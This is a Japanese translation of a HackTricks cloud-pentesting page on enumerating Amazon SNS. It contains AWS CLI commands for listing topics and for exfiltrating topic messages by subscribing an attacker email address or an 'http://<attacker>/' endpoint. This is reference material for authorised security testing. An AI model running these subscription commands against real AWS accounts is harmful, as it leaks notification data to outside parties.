AWS - SNS Enum

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法:

HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
公式PEASS＆HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
**💬 Discordグループ**に参加するか、telegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローする
ハッキングトリックを共有するために、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出する

SNS

Amazon Simple Notification Service（Amazon SNS）は、完全に管理されたメッセージングサービスとして説明されています。アプリケーション間（A2A）およびアプリケーション対人（A2P）の両方の通信タイプをサポートしています。

A2A通信の主な機能にはパブリッシュ/サブスクライブ（pub/sub）メカニズムがあります。これらのメカニズムは、トピックを導入し、高スループット、プッシュベース、多対多メッセージングを可能にするために重要です。この機能は、分散システム、マイクロサービス、およびイベント駆動型サーバーレスアーキテクチャを含むシナリオで非常に有利です。これらのトピックを活用することで、パブリッシャーシステムは効率的にメッセージを幅広いサブスクライバーシステムに配信し、ファンアウトメッセージングパターンを容易にします。

SQSとの違い

SQSはキューベースのサービスであり、ポイントツーポイント通信を可能にし、メッセージが単一のコンシューマによって処理されることを保証します。少なくとも一度の配信を提供し、標準キューとFIFOキューをサポートし、リトライや遅延処理のためのメッセージ保持を許可します。一方、SNSはパブリッシュ/サブスクライブベースのサービスであり、一対多の通信を可能にし、メッセージを複数のサブスクライバーに同時にブロードキャストします。メール、SMS、Lambda関数、HTTP/HTTPSなどのさまざまなサブスクリプションエンドポイントをサポートし、ターゲットメッセージ配信のためのフィルタリングメカニズムを提供します。両方のサービスは分散システムのコンポーネント間の切り離しを可能にしますが、SQSはキュー通信に焦点を当て、SNSはイベント駆動型のファンアウト通信パターンに重点を置いています。

列挙

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

トピックがFIFOタイプの場合、SQSプロトコルを使用するサブスクライバーのみ使用できます（HTTPまたはHTTPSは使用できません）。

また、--topic-arnにリージョンが含まれていても、--region で正しいリージョンを指定してください。そうしないと、アクセス権限がないというエラーが表示されますが、問題はリージョンにある可能性があります。

参考文献

https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/

htARTE（HackTricks AWS Red Team Expert） を使って、ゼロからヒーローまでAWSハッキングを学びましょう！

HackTricksをサポートする他の方法：

HackTricksで企業を宣伝したい、またはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
公式PEASS＆HackTricksのグッズを手に入れる
The PEASS Familyを発見し、独占的なNFTsコレクションを見つける
💬 Discordグループやtelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローする
HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する

前へAWS - SES Enum 次へAWS - SQS Enum

最終更新 2 か月前

SNS

SQSとの違い

列挙

認証されていないアクセス

特権昇格

攻撃後の処理

永続性

参考文献